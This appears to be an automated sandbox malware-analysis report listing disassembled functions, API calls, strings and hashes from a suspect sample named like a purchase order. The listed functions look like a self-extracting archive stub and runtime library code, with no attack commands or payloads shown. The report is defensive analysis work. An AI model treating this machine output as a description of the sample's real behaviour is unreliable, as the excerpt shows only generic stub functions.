APIs

type_info::operator==.LIBVCRUNTIME ref: 00BC2F50
___TypeMatch.LIBVCRUNTIME ref: 00BC305E
_UnwindNestedFrames.LIBCMT ref: 00BC31B0
CallUnexpected.LIBVCRUNTIME ref: 00BC31CB
_abort.LIBCMT ref: 00BC31D0

Strings

csm, xrefs: 00BC2EDB
csm, xrefs: 00BC2E6E
csm, xrefs: 00BC2F87

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: b5c922b0f6261b7d6b8e3306939694d256c2d57804fa6c3ac51e50577d7fba19
Instruction ID: d9aed2e94d997b51dd1e2b8172d04f6144f64f5eda749f172262d5268d0f117c
Opcode Fuzzy Hash: b5c922b0f6261b7d6b8e3306939694d256c2d57804fa6c3ac51e50577d7fba19
Instruction Fuzzy Hash: FDB12571900209EFCF29DFA4C881EAEBBF5EF14710B58819EF8156B212D735DA61CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BA6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA6FAA
_wcslen.LIBCMT ref: 00BA7013
_wcslen.LIBCMT ref: 00BA7084

Part of subcall function 00BA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BA7AAB
Part of subcall function 00BA7A9C: GetLastError.KERNEL32 ref: 00BA7AF1
Part of subcall function 00BA7A9C: CloseHandle.KERNEL32(?), ref: 00BA7B00

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00BA6FCC
SeRestorePrivilege, xrefs: 00BA6FC2
UNC\, xrefs: 00BA7051
\??\, xrefs: 00BA702B

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 4fe7804636451ecc28696e7e444e71daf48779791dca8d17102c6bb12abcabd7
Instruction ID: 494d865fe31e0d55f00f4a614f3de3c895241473a594704aacf7d77f441ac92a
Opcode Fuzzy Hash: 4fe7804636451ecc28696e7e444e71daf48779791dca8d17102c6bb12abcabd7
Instruction Fuzzy Hash: 0041B3B1D4C744BAEB21A7749C82FEEB7E8DB06704F0044D5F955A6182EA74AA448721

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9711 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BB9736
_wcslen.LIBCMT ref: 00BB97D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00BB97E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00BB9806

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00BB9760
utf-8"></head>, xrefs: 00BB976B
<html>, xrefs: 00BB9755, 00BB978E
</html>, xrefs: 00BB97B7

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _wcslen$AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1116704506-4209811716
Opcode ID: e508958bc2a1c2d44b3053cf29e60af31972bb427036e044c3133b3ae57f0686
Instruction ID: 3e1ad6b89fb2810361c434eb7137cc15b125cb9bc7229152f7d6bae876b08f30
Opcode Fuzzy Hash: e508958bc2a1c2d44b3053cf29e60af31972bb427036e044c3133b3ae57f0686
Instruction Fuzzy Hash: 583115321083127BD725AB259C46FBBB7D8EF52750F14019EF601961D2FFA49A0483A6

Uniqueness

Uniqueness Score: -1.00%

Function 00BBB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA1316: GetDlgItem.USER32(00000000,00003021), ref: 00BA135A
Part of subcall function 00BA1316: SetWindowTextW.USER32(00000000,00BD35F4), ref: 00BA1370

EndDialog.USER32(?,00000001), ref: 00BBB610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00BBB637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00BBB650
SetWindowTextW.USER32(?,?), ref: 00BBB661
GetDlgItem.USER32(?,00000065), ref: 00BBB66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00BBB67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00BBB694

Strings

LICENSEDLG, xrefs: 00BBB5D4

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 9b67c27819b1762564e35f76c20262ce186342200adca9afd703c1d5b87f1483
Instruction ID: c1afcca77030aff2bae6d2a4c77caf8a3e5282ce464f3114d23e634c6312a0ca
Opcode Fuzzy Hash: 9b67c27819b1762564e35f76c20262ce186342200adca9afd703c1d5b87f1483
Instruction Fuzzy Hash: 3021D332204219BBD6215F66ED89FBF7BADEB4AB45F020054F606A70A0CFD29D01D635

Uniqueness

Uniqueness Score: -1.00%

Function 00BBFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,BCD48ACC,00000001,00000000,00000000,?,?,00BAAF6C,ROOT\CIMV2), ref: 00BBFD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00BAAF6C,ROOT\CIMV2), ref: 00BBFE14
SysAllocString.OLEAUT32(00000000), ref: 00BBFE1F
_com_issue_error.COMSUPP ref: 00BBFE48
_com_issue_error.COMSUPP ref: 00BBFE52
GetLastError.KERNEL32(80070057,BCD48ACC,00000001,00000000,00000000,?,?,00BAAF6C,ROOT\CIMV2), ref: 00BBFE57
_com_issue_error.COMSUPP ref: 00BBFE6A
GetLastError.KERNEL32(00000000,?,?,00BAAF6C,ROOT\CIMV2), ref: 00BBFE80
_com_issue_error.COMSUPP ref: 00BBFE93

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: c2938d308179a8464447bd62667e442767d1087faf86ca9515f5bd841a67677c
Instruction ID: 125c543d9d877874c9cbe0f08b3c790d5907108bed6d650a69febb401c2058be
Opcode Fuzzy Hash: c2938d308179a8464447bd62667e442767d1087faf86ca9515f5bd841a67677c
Instruction Fuzzy Hash: 0B41C971A00216ABDB109F68CC45BFEFBE8EB48B10F1082BAF915E7251DB75D940C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00BAAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BAAF29

Strings

Name, xrefs: 00BAB0B0
WQL, xrefs: 00BAAFDC
SELECT * FROM Win32_OperatingSystem, xrefs: 00BAAFCA
ROOT\CIMV2, xrefs: 00BAAF5C
Windows 10, xrefs: 00BAB0C2

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 6e0df7213842721af5001d7fddabe500baaf86ed2041fb3decab727d809d4039
Instruction ID: 2be76485e55ded6af8ad9ca3828172bfb7f5d8c8b1b0c3dfc4b4eebe759a25e3
Opcode Fuzzy Hash: 6e0df7213842721af5001d7fddabe500baaf86ed2041fb3decab727d809d4039
Instruction Fuzzy Hash: 61715971A00219AFDF24DFA4C895DAEB7F9FF49710B14019EE512E72A1DB31AE01CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA9387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00BA93AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00BA93C9

Part of subcall function 00BAC29A: _wcslen.LIBCMT ref: 00BAC2A2

Part of subcall function 00BB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BAC116,00000000,.exe,?,?,00000800,?,?,?,00BB8E3C), ref: 00BB1FD1

_swprintf.LIBCMT ref: 00BA9465

Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5

MoveFileW.KERNEL32(?,?), ref: 00BA94D4
MoveFileW.KERNEL32(?,?), ref: 00BA9514

Strings

rtmp%d, xrefs: 00BA944E

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: dec52ba80f33f8bc319e9aea894002a0c25bbfd1d472687d814c84ea8411542d
Instruction ID: 7689e8250d44b21e914af7fcc0ba05d30b56eddad2829bbd8e5b30e94868d237
Opcode Fuzzy Hash: dec52ba80f33f8bc319e9aea894002a0c25bbfd1d472687d814c84ea8411542d
Instruction Fuzzy Hash: 5C41667190425866DF21AB60CC56EEE73FCEF56740F0048E5B649E3151EF748B89DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00BB122E

Part of subcall function 00BAB146: GetVersionExW.KERNEL32(?), ref: 00BAB16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00BB1251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00BB1263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00BB1274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB1284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB1294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00BB12CF
__aullrem.LIBCMT ref: 00BB1379

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 62f80025f2c2cbaff42f1934d16eb3a618fc03b78168d1f2c13ff18e5690bede
Instruction ID: 9dc21c0c6d110dcf8a53171731cef41555ac7754a9a6f09adf85b1ecadaffa06
Opcode Fuzzy Hash: 62f80025f2c2cbaff42f1934d16eb3a618fc03b78168d1f2c13ff18e5690bede
Instruction Fuzzy Hash: 914116B1508306AFC710DF69C8849ABFBE9FB88714F408D2EF596D2210E774E649CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BA2536

Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5

Part of subcall function 00BB05DA: _wcslen.LIBCMT ref: 00BB05E0

Strings

xc%u, xrefs: 00BA275A
;%u, xrefs: 00BA2523
x%u, xrefs: 00BA26FD

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 4e1ba2ce7f0ac97490964e2fc3ab47360c626391c37616ec9fe1b9b8ec857f57
Instruction ID: b9d5457d174da1615b30a1cfee34701c22e7e618db9f5426f3d344f47b43be8d
Opcode Fuzzy Hash: 4e1ba2ce7f0ac97490964e2fc3ab47360c626391c37616ec9fe1b9b8ec857f57
Instruction Fuzzy Hash: 1BF1277060C3409BCF25DB2C8595BFE7BD5AF92300F0845EDFD869B283DB64994987A2

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BB9D0A

Strings

</style>, xrefs: 00BB9E52
</p>, xrefs: 00BB9DE8
>, xrefs: 00BB9D4B
<style>, xrefs: 00BB9E30
<br>, xrefs: 00BB9DFE

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: b6e35a17a5bccd1475f6116bc79360b0d0cffca711bbfabc518c9b62fac97509
Instruction ID: 1cc1eb71cf02c2078eb382c62522c058f756ca16c990e207b22dd3452d452fe0
Opcode Fuzzy Hash: b6e35a17a5bccd1475f6116bc79360b0d0cffca711bbfabc518c9b62fac97509
Instruction Fuzzy Hash: 2251F85674032397DB349A2A98117F673E0DFA1750F6944AAFBC1CB2C0FBE5CC458261

Uniqueness

Uniqueness Score: -1.00%

Function 00BCF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00BCFE02,00000000,00000000,00000000,00000000,00000000,00BC529F), ref: 00BCF6CF
__fassign.LIBCMT ref: 00BCF74A
__fassign.LIBCMT ref: 00BCF765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00BCF78B
WriteFile.KERNEL32(?,00000000,00000000,00BCFE02,00000000,?,?,?,?,?,?,?,?,?,00BCFE02,00000000), ref: 00BCF7AA
WriteFile.KERNEL32(?,00000000,00000001,00BCFE02,00000000,?,?,?,?,?,?,?,?,?,00BCFE02,00000000), ref: 00BCF7E3

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 2352e0ec6a88d0c7d76bee7d05baf034085c52c343a66399be61163757f935da
Instruction ID: 28e97ceafe97ca54f92101f7e53956a4790c0fddba43b32d471b7115cf359f35
Opcode Fuzzy Hash: 2352e0ec6a88d0c7d76bee7d05baf034085c52c343a66399be61163757f935da
Instruction Fuzzy Hash: C55192B190024A9FDB10CFA8DC85FEEBBF5EF09310F1441AEE555E7251E630AA40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00BC2937
___except_validate_context_record.LIBVCRUNTIME ref: 00BC293F
_ValidateLocalCookies.LIBCMT ref: 00BC29C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00BC29F3
_ValidateLocalCookies.LIBCMT ref: 00BC2A48

Strings

csm, xrefs: 00BC29DD

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 597a81ecca61fcf05c8c9d0517f437835a8b36ab2b967098e3496c02c4c8be7a
Instruction ID: 18390740d05dd0fd6ec2240a1bf019b640073df49e511123882a225ac6ae53d8
Opcode Fuzzy Hash: 597a81ecca61fcf05c8c9d0517f437835a8b36ab2b967098e3496c02c4c8be7a
Instruction Fuzzy Hash: FF418434A002089FCF10DF68C885F9EBBE5EF44314F1480AAE8195B392D7719A55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00BB9EEE
GetWindowRect.USER32(?,00000000), ref: 00BB9F44
ShowWindow.USER32(?,00000005,00000000), ref: 00BB9FDB
SetWindowTextW.USER32(?,00000000), ref: 00BB9FE3
ShowWindow.USER32(00000000,00000005), ref: 00BB9FF9

Strings

RarHtmlClassName, xrefs: 00BB9FA5

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 32efff99421b56e25cf3dbc44438f580d2b8a1345ed6868a0e0fe551c6651fb0
Instruction ID: 6bebe29c595b15c2e2ab9990a3cddf57e0f8b0c547b39c56e1b297f33468e1dd
Opcode Fuzzy Hash: 32efff99421b56e25cf3dbc44438f580d2b8a1345ed6868a0e0fe551c6651fb0
Instruction Fuzzy Hash: A041BF31508214EFDB216F649C48BBFBFECEF48711F008599F949AA156CB74E904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BB995E
_wcslen.LIBCMT ref: 00BB9993

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00BB9987
, xrefs: 00BB99B0
 , xrefs: 00BB9A21
<br>, xrefs: 00BB99DF

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: caaa65395c90fbaf0e422ffab1138d0c91e166b752f3af635e539cadc1ebe0b2
Instruction ID: b11e8305649fcab9ea4de945e6648bcefd55bdaff81209abdc52bb59ce3d0c20
Opcode Fuzzy Hash: caaa65395c90fbaf0e422ffab1138d0c91e166b752f3af635e539cadc1ebe0b2
Instruction Fuzzy Hash: F6313E3264434597D634AB549C42FFAB3E4EB50720F50849FFA96572C0FBE0AD4183A1

Uniqueness

Uniqueness Score: -1.00%

Function 00BCC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BCC868: _free.LIBCMT ref: 00BCC891

_free.LIBCMT ref: 00BCC8F2

Part of subcall function 00BC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?), ref: 00BC8DE2
Part of subcall function 00BC8DCC: GetLastError.KERNEL32(?,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?,?), ref: 00BC8DF4

_free.LIBCMT ref: 00BCC8FD
_free.LIBCMT ref: 00BCC908
